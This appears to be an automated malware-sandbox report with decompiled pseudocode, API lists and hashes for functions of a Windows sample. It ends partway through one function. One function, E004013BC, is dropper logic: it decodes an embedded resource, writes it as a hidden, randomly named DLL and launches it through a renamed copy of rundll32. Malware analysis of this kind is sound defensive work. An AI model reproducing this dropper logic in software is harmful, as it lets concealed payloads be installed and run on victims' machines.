Executed
Not Executed

C-Code - Quality: 82%

			E004B7114(struct HINSTANCE__* __eax) {
				struct HINSTANCE__* _t4;
				CHAR* _t7;
				void* _t8;

				_t4 = __eax;
				asm("pushad");
				_t7 =  *(_t8 + 0x2647);
				while( *_t7 != 1) {
					_t4 =  *((intOrPtr*)(_t8 + 0xb05))(_t7);
					if(_t4 == 0) {
						_t4 = LoadLibraryA(_t7);
						if(_t4 == 0) {
							_t4 = E004B7148(_t7);
						}
					}
					while( *_t7 != 0) {
						_t7 =  &(_t7[1]);
					}
					_t7 =  &(_t7[1]);
				}
				asm("popad");
				return _t4;
			}

0x004b7114
0x004b7114
0x004b7115
0x004b7141
0x004b7124
0x004b7126
0x004b712f
0x004b7131
0x004b7133
0x004b7133
0x004b7131
0x004b713b
0x004b713a
0x004b713a
0x004b7140
0x004b7140
0x004b7146
0x004b7147

APIs

LoadLibraryA.KERNELBASE(?), ref: 004B7129

Memory Dump Source

Source File: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f7215e5c88bd8584eeeef7b4fe5130b74e6871c6b9ebad737e72971a41f8c06e
Instruction ID: 28aa9155c9c21b83bdb7bcef97a423d10cb3e5a31c1a923e1a5360d2fc2f006b
Opcode Fuzzy Hash: f7215e5c88bd8584eeeef7b4fe5130b74e6871c6b9ebad737e72971a41f8c06e
Instruction Fuzzy Hash: 6EE0122054D5A566DF322F2C48057EA7AD06FA2354F211466E4C6A5701F7AC0D829BFE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401A9F Relevance: 9.1, APIs: 6, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401A9F(void* __ecx, void* __edx) {
				struct tagRECT _v20;
				signed int _v100;
				void* _v104;
				int _t15;
				int _t20;
				int _t21;
				int _t36;
				void* _t44;
				void* _t49;

				_t44 = __edx;
				_t49 = __ecx;
				_t15 = IsIconic( *(__ecx + 0x20));
				if(_t15 == 0) {
					L0041530A();
					return _t15;
				}
				_push(_t49);
				L00415316();
				asm("sbb eax, eax");
				SendMessageA( *(_t49 + 0x20), 0x27,  ~( &_v104) & _v100, 0);
				_t20 = GetSystemMetrics(0xb);
				_t21 = GetSystemMetrics(0xc);
				GetClientRect( *(_t49 + 0x20),  &_v20);
				asm("cdq");
				asm("cdq");
				_t36 = DrawIcon(_v100, _v20.right - _v20.left - _t20 + 1 - _t44 >> 1, _v20.bottom - _v20.top - _t21 + 1 - _t44 >> 1,  *(_t49 + 0x80));
				L00415310();
				return _t36;
			}

0x00401a9f
0x00401aa6
0x00401aab
0x00401ab3
0x00401b32
0x00000000
0x00401b32
0x00401ab7
0x00401abb
0x00401ac7
0x00401ad2
0x00401ae0
0x00401ae6
0x00401af1
0x00401b06
0x00401b15
0x00401b1e
0x00401b27
0x00000000

APIs

IsIconic.USER32(?), ref: 00401AAB
SendMessageA.USER32(?,00000027,?,00000000), ref: 00401AD2
GetSystemMetrics.USER32(0000000B), ref: 00401AE0
GetSystemMetrics.USER32(0000000C), ref: 00401AE6
GetClientRect.USER32(?,?), ref: 00401AF1
DrawIcon.USER32(?,?,?,?), ref: 00401B1E

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
String ID:
API String ID: 2166663075-0
Opcode ID: c0666227f9d517d82840dde3631b24f9bc539510c4346564aa02d05e315ece31
Instruction ID: 088e3e68de5ff62e47a0c8f7cb64779c5762a4f9d9f917aba8eef08205d66377
Opcode Fuzzy Hash: c0666227f9d517d82840dde3631b24f9bc539510c4346564aa02d05e315ece31
Instruction Fuzzy Hash: B511517261021DAFCB00ABB8DD49EEEB7B9FB84304F044629F956D70A0DB74E901DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00414FFF Relevance: 7.6, APIs: 5, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00414FFF(void* __ecx, void* __eflags) {
				long _v8;
				long _v12;
				struct _MEMORY_BASIC_INFORMATION _v40;
				struct _SYSTEM_INFO _v76;
				void* _v88;
				void* _t11;
				int _t15;
				long _t17;
				void* _t18;
				void* _t25;
				void* _t34;
				void* _t37;
				void* _t41;
				void* _t42;

				_t11 = 4;
				E00415390(_t11, __ecx);
				_t34 = _t42;
				if(VirtualQuery(_t34,  &_v40, 0x1c) == 0) {
					L2:
					_t15 = 0;
				} else {
					_t37 = _v40.AllocationBase;
					GetSystemInfo( &_v76);
					_t17 = _v76.dwPageSize;
					_v8 = _t17;
					_t41 = ( !(_t17 - 1) & _t34) - _t17;
					_t18 = E004150B3();
					asm("sbb eax, eax");
					if(_t41 >= ( ~(_t18 - 1) & 0x00001000) + 0x11000 + _t37) {
						if(E004150B3() != 1) {
							if(_t41 > _t37) {
								VirtualFree(_t37, _t41 - _t37, 0x4000);
							}
							VirtualAlloc(_t41, _v8, 0x1000, 4);
						}
						_t25 = E004150B3();
						asm("sbb eax, eax");
						_t15 = VirtualProtect(_t41, _v8, ( ~(_t25 - 1) & 0x00000103) + 1,  &_v12);
					} else {
						goto L2;
					}
				}
				return _t15;
			}

0x0041500a
0x0041500b
0x00415010
0x00415021
0x00415058
0x00415058
0x00415023
0x00415023
0x0041502a
0x00415030
0x00415033
0x0041503d
0x0041503f
0x00415047
0x00415056
0x00415064
0x00415068
0x00415075
0x00415075
0x00415086
0x00415086
0x0041508c
0x00415097
0x004150a5
0x00000000
0x00000000
0x00000000
0x00415056
0x004150b2

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00415019
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041502A

Part of subcall function 004150B3: GetVersionExA.KERNEL32(?), ref: 004150E4

VirtualFree.KERNEL32(?,?,00004000,?,?,0000001C), ref: 00415075
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00415086
VirtualProtect.KERNEL32(?,?,00000000,?,?,?,0000001C), ref: 004150A5

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: Virtual$AllocFreeInfoProtectQuerySystemVersion
String ID:
API String ID: 2795766573-0
Opcode ID: 834cf1a71c9c5ed003860edc690bd353255b54ad79c9a6b5e54ee2e945d25065
Instruction ID: 6d54ece17a00f09206e5511fc7c9e2413ccf1818c2fd634c5d4940529b78a55d
Opcode Fuzzy Hash: 834cf1a71c9c5ed003860edc690bd353255b54ad79c9a6b5e54ee2e945d25065
Instruction Fuzzy Hash: 61110B76A50A09EADB1167F0DD49FEF7F78EB4D385F100121FA01E3180D5389A4586D9

Uniqueness

Uniqueness Score: -1.00%

Function 004150B3 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004150B3() {
				struct _OSVERSIONINFOA _v152;
				signed int _t6;

				if(( *0x41c9bd & 0x00000001) == 0) {
					 *0x41c9bd =  *0x41c9bd | 0x00000001;
					 *0x41c9c0 =  *0x41c9c0 & 0x00000000;
					_v152.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v152) != 0) {
						 *0x41c9c0 = _v152.dwPlatformId;
					}
					E0041536C(E004043CC);
				}
				_t6 =  *0x41c9c0; // 0x0
				return _t6;
			}

0x004150c3
0x004150c5
0x004150cc
0x004150d9
0x004150ec
0x004150f4
0x004150f4
0x004150fe
0x00415103
0x00415104
0x0041510a

APIs

GetVersionExA.KERNEL32(?), ref: 004150E4

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 875cac5599071a03cf6d967225fbd84f2cf9bf561e0a438da5ca14a86c743399
Instruction ID: 929566bd8b4077ec1c8b267c5b5c8a2ef05b37bc6fe8b5fd74154d79ce4bd554
Opcode Fuzzy Hash: 875cac5599071a03cf6d967225fbd84f2cf9bf561e0a438da5ca14a86c743399
Instruction Fuzzy Hash: 35E06DB199921897E710DB64ED89FD53BE8B744308F0090AAD908922D2D7B88889CB4E

Uniqueness

Uniqueness Score: -1.00%

Function 004013BC Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 306
filesleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E004013BC() {
				long _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				long _v24;
				void* _v39;
				void _v40;
				void* _v44;
				void* _v48;
				struct _STARTUPINFOA _v116;
				struct _PROCESS_INFORMATION _v132;
				char _v168;
				void _v427;
				char _v428;
				void _v687;
				char _v688;
				void _v947;
				char _v948;
				void _v1207;
				char _v1208;
				void _v1719;
				char _v1720;
				int _t108;
				void* _t136;
				signed int _t138;
				signed int _t139;
				void* _t177;
				signed int _t178;
				signed int _t193;
				signed int _t200;
				signed int _t201;
				signed int _t205;
				signed int _t209;
				signed int _t213;
				signed int _t214;
				signed int _t217;
				struct HRSRC__* _t218;
				signed int _t219;
				void* _t238;
				void* _t240;
				void* _t243;
				void* _t244;
				void* _t247;

				_t218 = FindResourceA(0, 0x82, "GUI");
				if(_t218 == 0) {
					L2:
					return 0;
				}
				_t238 = LoadResource(0, _t218);
				if(_t238 != 0) {
					_t108 = SizeofResource(0, _t218);
					_v8 = _t108;
					memcpy(_t238, LockResource(_t238), _t108);
					_v16 =  *_t238 & 0x000000ff;
					_t244 = _t243 + 0xc;
					_t219 = 0;
					_v12 =  *(_t238 + 1) & 0x000000ff;
					if(_v8 <= 0) {
						L11:
						_t193 = 0x40;
						_v428 = 0;
						_push(0x40);
						memset( &_v427, 0, _t193 << 2);
						asm("stosw");
						asm("stosb");
						_v688 = 0;
						memset( &_v687, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						E0040107C( &_v40, 5);
						wsprintfA( &_v428, "d:\\Program Files\\%s",  &_v40);
						_t247 = _t244 + 0x2c;
						if(CreateDirectoryA( &_v428, 0) == 0) {
							wsprintfA( &_v428, "c:\\Program Files\\%s",  &_v40);
							_t247 = _t247 + 0xc;
							CreateDirectoryA( &_v428, 0);
						}
						Sleep(0x64);
						SetFileAttributesA( &_v428, 2);
						memset( &_v40, 0, 0x10);
						E0040107C( &_v40, 5);
						wsprintfA( &_v688, "%s\\%s.dll",  &_v428,  &_v40);
						_t136 = CreateFileA( &_v688, 0x40000000, 2, 0, 2, 0x80, 0);
						_v44 = _t136;
						WriteFile(_t136, _t238, _v8,  &_v24, 0);
						_t138 = rand();
						asm("cdq");
						_t139 = _t138 / 0xff;
						_t214 = _t138 % 0xff;
						_push(_t214);
						_v20 = _t214;
						L004151F6();
						_v48 = _t139;
						_t200 = _v20;
						if(_t200 <= 0) {
							L16:
							_t240 = _v44;
							WriteFile(_t240, _v48, _v20,  &_v24, 0);
							SetFilePointer(_t240, 0, 0, 0);
							WriteFile(_t240, "MZ", 2,  &_v24, 0);
							CloseHandle(_t240);
							_t201 = 8;
							memcpy( &_v168, "c:\\windows\\system32\\rundll32.exe", _t201 << 2);
							asm("movsw");
							_push(0x40);
							_v948 = 0;
							memset( &_v947, 0, 0 << 2);
							asm("stosw");
							asm("stosb");
							memset( &_v40, 0, 0x10);
							E0040107C( &_v40, 3);
							wsprintfA( &_v948, "%s\\%s.exe",  &_v428,  &_v40);
							CopyFileA( &_v168,  &_v948, 0);
							_t205 = 0x7f;
							_v1720 = 0;
							_push(0x40);
							memset( &_v1719, 0, _t205 << 2);
							asm("stosw");
							asm("stosb");
							_v1208 = 0;
							memset( &_v1207, 0, 0 << 2);
							asm("stosw");
							asm("stosb");
							GetModuleFileNameA(0,  &_v1208, 0x104);
							wsprintfA( &_v1720, "%s \"%s\",Hlink %s",  &_v948,  &_v688,  &_v1208);
							_t209 = 0x10;
							memset( &(_v116.lpReserved), 0, _t209 << 2);
							_v116.cb = 0x44;
							_v116.lpDesktop = "WinSta0\\Default";
							_v116.wShowWindow = 0;
							CreateProcessA(0,  &_v1720, 0, 0, 0, 0, 0, 0,  &_v116,  &_v132);
							_t177 = 1;
							return _t177;
						} else {
							_v12 = 0xfa;
							_v8 = _t139;
							_v12 = _v12 - _t139;
							_v16 = _t200;
							do {
								_t178 = rand();
								asm("cdq");
								_v8 = _v8 + 1;
								_t67 =  &_v16;
								 *_t67 = _v16 - 1;
								 *_v8 = _t178 % (_v12 + _v8);
							} while ( *_t67 != 0);
							goto L16;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						asm("cdq");
						_t213 = 3;
						_t217 = _t219 % _t213;
						if(_t217 == 2) {
							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v16;
						}
						if(_t217 == 1) {
							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v12;
						}
						if(_t217 == 0) {
							 *((intOrPtr*)(_t238 + _t219)) =  *((intOrPtr*)(_t238 + _t219)) - _v12 + _v16;
						}
						_t219 = _t219 + 1;
					} while (_t219 < _v8);
					goto L11;
				}
				goto L2;
			}

0x004013db
0x004013df
0x004013ef
0x00000000
0x004013ef
0x004013e9
0x004013ed
0x004013f8
0x00401400
0x0040140b
0x00401413
0x00401416
0x0040141d
0x00401422
0x00401425
0x00401458
0x0040145c
0x00401463
0x00401469
0x0040146b
0x0040146d
0x0040146f
0x00401479
0x0040147f
0x00401481
0x00401483
0x00401489
0x0040148e
0x0040148f
0x00401490
0x00401491
0x00401493
0x00401498
0x004014b3
0x004014b5
0x004014c8
0x004014da
0x004014dc
0x004014e7
0x004014e7
0x004014ef
0x004014fe
0x0040150b
0x00401516
0x00401532
0x0040154e
0x00401562
0x00401567
0x0040156f
0x00401571
0x00401577
0x00401577
0x00401579
0x0040157a
0x0040157d
0x00401583
0x00401586
0x0040158b
0x004015b7
0x004015ba
0x004015c6
0x004015cc
0x004015df
0x004015e2
0x004015ef
0x004015f6
0x004015f8
0x004015fa
0x00401605
0x0040160d
0x0040160f
0x00401611
0x00401617
0x00401622
0x00401644
0x00401658
0x00401662
0x00401669
0x0040166f
0x00401671
0x00401673
0x00401675
0x0040167f
0x00401685
0x00401687
0x00401689
0x00401697
0x004016be
0x004016ca
0x004016cb
0x004016d0
0x004016ea
0x004016f1
0x004016f5
0x004016fd
0x00000000
0x0040158d
0x0040158d
0x00401594
0x00401597
0x0040159a
0x0040159d
0x0040159d
0x004015a7
0x004015ad
0x004015b0
0x004015b0
0x004015b3
0x004015b3
0x00000000
0x0040159d
0x00000000
0x00000000
0x00000000
0x00401427
0x00401427
0x0040142b
0x0040142c
0x0040142d
0x00401432
0x00401437
0x00401437
0x0040143d
0x00401442
0x00401442
0x00401447
0x0040144f
0x0040144f
0x00401452
0x00401453
0x00000000
0x00401427
0x00000000

APIs

FindResourceA.KERNEL32(00000000,00000082,GUI), ref: 004013D5
LoadResource.KERNEL32(00000000,00000000), ref: 004013E3
SizeofResource.KERNEL32(00000000,00000000), ref: 004013F8
LockResource.KERNEL32(00000000,00000000), ref: 00401403
memcpy.MSVCRT ref: 0040140B
wsprintfA.USER32 ref: 004014B3
CreateDirectoryA.KERNEL32(?,00000000), ref: 004014C0
wsprintfA.USER32 ref: 004014DA
CreateDirectoryA.KERNEL32(?,00000000), ref: 004014E7
Sleep.KERNEL32(00000064), ref: 004014EF
SetFileAttributesA.KERNEL32(?,00000002), ref: 004014FE
memset.MSVCRT ref: 0040150B

Part of subcall function 0040107C: GetTickCount.KERNEL32 ref: 00401095
Part of subcall function 0040107C: srand.MSVCRT ref: 0040109C
Part of subcall function 0040107C: rand.MSVCRT ref: 004010A9
Part of subcall function 0040107C: rand.MSVCRT ref: 004010C1

wsprintfA.USER32 ref: 00401532
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040154E
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401567
rand.MSVCRT ref: 0040156F
rand.MSVCRT ref: 0040159D
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004015C6
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 004015CC
WriteFile.KERNEL32(?,0041C0C8,00000002,?,00000000), ref: 004015DF
CloseHandle.KERNEL32(?), ref: 004015E2
memset.MSVCRT ref: 00401617
wsprintfA.USER32 ref: 00401644
CopyFileA.KERNEL32(?,?,00000000), ref: 00401658
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401697
wsprintfA.USER32 ref: 004016BE
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004016F5

Strings

GUI, xrefs: 004013C8
%s\%s.dll, xrefs: 0040152C
c:\Program Files\%s, xrefs: 004014D4
WinSta0\Default, xrefs: 004016EA
%s\%s.exe, xrefs: 0040163E
c:\windows\system32\rundll32.exe, xrefs: 004015EA
d:\Program Files\%s, xrefs: 004014AD
D, xrefs: 004016D0
%s "%s",Hlink %s, xrefs: 004016B8

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: File$wsprintf$CreateResourcerand$Write$Directorymemset$AttributesCloseCopyCountFindHandleLoadLockModuleNamePointerProcessSizeofSleepTickmemcpysrand
String ID: %s "%s",Hlink %s$%s\%s.dll$%s\%s.exe$D$GUI$WinSta0\Default$c:\Program Files\%s$c:\windows\system32\rundll32.exe$d:\Program Files\%s
API String ID: 3207154250-826311432
Opcode ID: 37b89522606a2c4a54853edb22f9fa52fe1b2d11cf8f40d47bde4dae3510350d
Instruction ID: ac8b8aeebc4711bad355f370068009a7f956b33eb2c00d030ca5656be22452af
Opcode Fuzzy Hash: 37b89522606a2c4a54853edb22f9fa52fe1b2d11cf8f40d47bde4dae3510350d
Instruction Fuzzy Hash: 5DA18DB2A4021CBFDB11DBA4CD85EDEBBBCAB48304F1044A6F245B7191DA749F848B65

Uniqueness

Uniqueness Score: -1.00%

Function 00401B41 Relevance: 35.5, APIs: 13, Strings: 7, Instructions: 482
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00401B41(void* __ecx, void* __edx, long long __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t229;
				char* _t247;
				signed int _t253;
				intOrPtr* _t256;
				char* _t258;
				signed int _t261;
				char* _t285;
				signed int _t292;
				char* _t303;
				void* _t304;
				signed int _t310;
				signed int _t312;
				char* _t317;
				void* _t320;
				void* _t335;
				void* _t342;
				void* _t365;
				signed int _t380;
				void* _t382;
				signed int _t389;
				intOrPtr* _t401;
				char* _t402;
				char* _t403;
				char* _t404;
				void* _t405;
				signed int _t410;
				intOrPtr* _t414;
				char* _t415;
				void* _t418;
				void* _t420;
				long long* _t421;
				long long* _t424;
				void* _t426;
				long long* _t427;
				long long _t430;

				_t430 = __fp0;
				L004153D0();
				_t421 = _t420 - 0x18c;
				_t229 =  *(_t418 + 8);
				_t320 = __ecx;
				if(_t229 != 0x1b) {
					__eflags = _t229 - 0x74;
					if(_t229 != 0x74) {
						__eflags = _t229 - 0x75;
						if(_t229 != 0x75) {
							__eflags = _t229 - 0x76;
							if(_t229 == 0x76) {
								_push(1);
								L00415334();
								_push(0x41c994);
								L004152E6();
								 *(_t418 + 8) = 0x82;
								__eflags =  *(__ecx + 0x6c);
								if( *(__ecx + 0x6c) != 0) {
									 *(_t418 + 8) = 0x83;
								}
								__eflags =  *(_t320 + 0x70);
								if( *(_t320 + 0x70) != 0) {
									_t149 = _t418 + 8;
									 *_t149 =  *(_t418 + 8) | 0x00000004;
									__eflags =  *_t149;
								}
								__eflags =  *(_t320 + 0x74);
								if( *(_t320 + 0x74) != 0) {
									_t152 = _t418 + 8;
									 *_t152 =  *(_t418 + 8) | 0x00000008;
									__eflags =  *_t152;
								}
								_t401 =  *0x417298;
								 *(_t418 - 0x18) =  *_t401();
								asm("fild dword [ebp-0x18]");
								 *(_t418 - 0x14) =  *(_t320 + 0x60);
								 *((long long*)(_t418 - 0x58)) = _t430;
								 *(_t418 - 0x28) =  *((intOrPtr*)(_t418 + 0xb));
								 *0x417230(0);
								 *0x417234( *(_t418 - 0x14), strlen( *(_t418 - 0x14)));
								 *(_t418 - 4) = 0x10;
								E00402534(_t418 - 0x198);
								 *((intOrPtr*)(_t418 - 0x198)) = 0x417660;
								 *(_t418 - 4) = 0x12;
								 *0x417230(1, _t418 - 0x28,  *(_t418 + 8), 0);
								 *((intOrPtr*)(_t418 - 0x3c)) = 0;
								 *((char*)(_t418 - 0x40)) =  *((intOrPtr*)(_t418 + 0xb));
								 *((intOrPtr*)(_t418 - 0x38)) = 0;
								 *((intOrPtr*)(_t418 - 0x34)) = 0;
								 *(_t418 + 8) =  *(_t320 + 0x68);
								 *(_t418 - 4) = 0x13;
								 *((char*)(_t418 - 0x74)) =  *((intOrPtr*)(_t418 + 0xb));
								 *0x417230(0);
								 *0x417234( *(_t418 + 8), strlen( *(_t418 + 8)));
								 *(_t418 - 4) = 0x14;
								_t247 = E004028AC(_t418 - 0x198, _t418 - 0x74, _t418 - 0x40, 0, 0, 0xffffffff);
								__eflags = _t247;
								 *(_t418 - 0x44) = _t247;
								if(_t247 > 0) {
									 *(_t418 + 8) = 0;
									 *(_t418 - 0x14) = _t247;
									do {
										_t253 =  *((intOrPtr*)(_t418 - 0x3c)) +  *(_t418 + 8);
										 *(_t418 - 0x18) = _t253;
										 *((char*)(_t418 - 0x8c)) =  *_t253;
										 *0x417230(0);
										_t256 =  *0x41723c; // 0x6cd05df0
										 *0x417240( *(_t418 - 0x18), 0,  *_t256);
										_t258 =  *(_t418 - 0x88);
										 *(_t418 - 4) = 0x15;
										__eflags = _t258;
										if(_t258 == 0) {
											_t258 =  *0x417238; // 0x6cd06082
										}
										L0041532E();
										L0041532E();
										 *(_t418 - 4) = 0x14;
										 *0x417230(1, "\r\n---------------------------------------------\r\n", _t258);
										 *(_t418 + 8) =  &(( *(_t418 + 8))[0x10]);
										_t207 = _t418 - 0x14;
										 *_t207 =  *(_t418 - 0x14) - 1;
										__eflags =  *_t207;
									} while ( *_t207 != 0);
								}
								 *(_t418 + 8) =  *_t401();
								_t335 = _t418 - 0x10;
								asm("fild dword [ebp+0x8]");
								 *((long long*)(_t418 - 0x50)) = _t430;
								L004152EC();
								 *(_t418 - 4) = 0x16;
								 *_t421 =  *((long long*)(_t418 - 0x50)) -  *((long long*)(_t418 - 0x58));
								L00415328();
								L00415322();
								L0041531C();
								L00415334();
								 *(_t418 - 4) = 0x14;
								L00415214();
								 *(_t418 - 4) = 0x13;
								 *0x417230(1, 0, 0x3ec,  *(_t418 - 0x10), _t418 - 0x10, 0x41c128, _t335, _t335,  *(_t418 - 0x44));
								 *(_t418 - 4) = 0x12;
								E00402408(_t418 - 0x40);
								_t224 = _t418 - 4;
								 *_t224 =  *(_t418 - 4) | 0xffffffff;
								__eflags =  *_t224;
								_t342 = _t418 - 0x198;
								goto L45;
							}
						} else {
							_push(1);
							L00415334();
							_push(0x41c994);
							L004152E6();
							 *(_t418 + 8) = 0x82;
							__eflags =  *(__ecx + 0x6c);
							if( *(__ecx + 0x6c) != 0) {
								 *(_t418 + 8) = 0x83;
							}
							__eflags =  *(_t320 + 0x70);
							if( *(_t320 + 0x70) != 0) {
								_t85 = _t418 + 8;
								 *_t85 =  *(_t418 + 8) | 0x00000004;
								__eflags =  *_t85;
							}
							__eflags =  *(_t320 + 0x74);
							if(__eflags != 0) {
								_t88 = _t418 + 8;
								 *_t88 =  *(_t418 + 8) | 0x00000008;
								__eflags =  *_t88;
							}
							_t414 =  *0x417298;
							_t261 =  *_t414();
							_t402 =  *(_t320 + 0x78);
							 *(_t418 - 0x18) = _t261;
							asm("fild dword [ebp-0x18]");
							 *(_t418 - 0x28) =  *((intOrPtr*)(_t418 + 0xb));
							 *((long long*)(_t418 - 0x48)) = _t430;
							 *0x417230(0);
							 *0x417234(_t402, strlen(_t402));
							_t403 =  *(_t320 + 0x60);
							 *(_t418 - 4) = 8;
							 *((char*)(_t418 - 0x9c)) =  *((intOrPtr*)(_t418 + 0xb));
							 *0x417230(0);
							 *0x417234(_t403, strlen(_t403));
							 *(_t418 - 4) = 9;
							E004025A0(_t418 - 0x144, __eflags);
							 *((intOrPtr*)(_t418 - 0x144)) = 0x417660;
							 *(_t418 - 4) = 0xc;
							 *0x417230(1, _t418 - 0x9c, _t418 - 0x28,  *(_t418 + 8), 0);
							 *(_t418 - 4) = 0xb;
							 *0x417230(1);
							E004023AE(_t418 - 0xcc);
							_t404 =  *(_t320 + 0x68);
							 *(_t418 - 4) = 0xd;
							 *((char*)(_t418 - 0x60)) =  *((intOrPtr*)(_t418 + 0xb));
							 *0x417230(0, _t418 + 0xb);
							 *0x417234(_t404, strlen(_t404));
							_push(0xffffffff);
							_push(0);
							_push(_t418 - 0xcc);
							 *(_t418 - 4) = 0xe;
							_push(_t418 - 0x60);
							_push(_t418 - 0x144);
							_t405 = E00402D2D(_t320, _t404, _t414);
							_t285 =  *(_t418 - 0x5c);
							_t424 = _t421 + 0x14;
							__eflags = _t285;
							if(_t285 == 0) {
								_t285 =  *0x417238; // 0x6cd06082
							}
							L004152E6();
							 *(_t418 - 0x18) =  *_t414(_t285);
							_t365 = _t418 - 0x14;
							asm("fild dword [ebp-0x18]");
							 *((long long*)(_t418 - 0x50)) = _t430;
							L004152EC();
							 *(_t418 - 4) = 0xf;
							 *_t424 =  *((long long*)(_t418 - 0x50)) -  *((long long*)(_t418 - 0x48));
							L00415328();
							L00415322();
							L0041531C();
							L00415334();
							 *(_t418 - 4) = 0xe;
							L00415214();
							 *(_t418 - 4) = 0xd;
							 *0x417230(1, 0, 0x3ec,  *(_t418 - 0x14), _t418 - 0x14, 0x41c104, _t365, _t365, _t405);
							 *(_t418 - 4) = 0xb;
							E004021A6(_t418 - 0xcc);
							 *(_t418 - 4) =  *(_t418 - 4) | 0xffffffff;
							_t342 = _t418 - 0x144;
							L45:
							_t229 = E00402269(_t342);
						}
					} else {
						_push(1);
						L00415334();
						_push(0x41c994);
						L004152E6();
						E004024EC(_t418 - 0x2c, _t418 + 0xb);
						 *((intOrPtr*)(_t418 - 0x30)) = 0x417664;
						 *(_t418 - 0x10) = 0x82;
						__eflags =  *(__ecx + 0x6c);
						 *(_t418 - 4) = 0;
						if( *(__ecx + 0x6c) != 0) {
							 *(_t418 - 0x10) = 0x83;
						}
						__eflags =  *(_t320 + 0x70);
						if( *(_t320 + 0x70) != 0) {
							_t11 = _t418 - 0x10;
							 *_t11 =  *(_t418 - 0x10) | 0x00000004;
							__eflags =  *_t11;
						}
						__eflags =  *(_t320 + 0x74);
						if( *(_t320 + 0x74) != 0) {
							_t14 = _t418 - 0x10;
							 *_t14 =  *(_t418 - 0x10) | 0x00000008;
							__eflags =  *_t14;
						}
						_t292 =  *0x417298();
						_t415 =  *(_t320 + 0x60);
						 *(_t418 - 0x18) = _t292;
						asm("fild dword [ebp-0x18]");
						 *((char*)(_t418 - 0x40)) =  *((intOrPtr*)(_t418 + 0xb));
						 *((long long*)(_t418 - 0x50)) = _t430;
						 *0x417230(0);
						 *0x417234(_t415, strlen(_t415));
						 *(_t418 - 4) = 1;
						E00402534(_t418 - 0xf0);
						 *((intOrPtr*)(_t418 - 0xf0)) = 0x417660;
						 *(_t418 - 4) = 3;
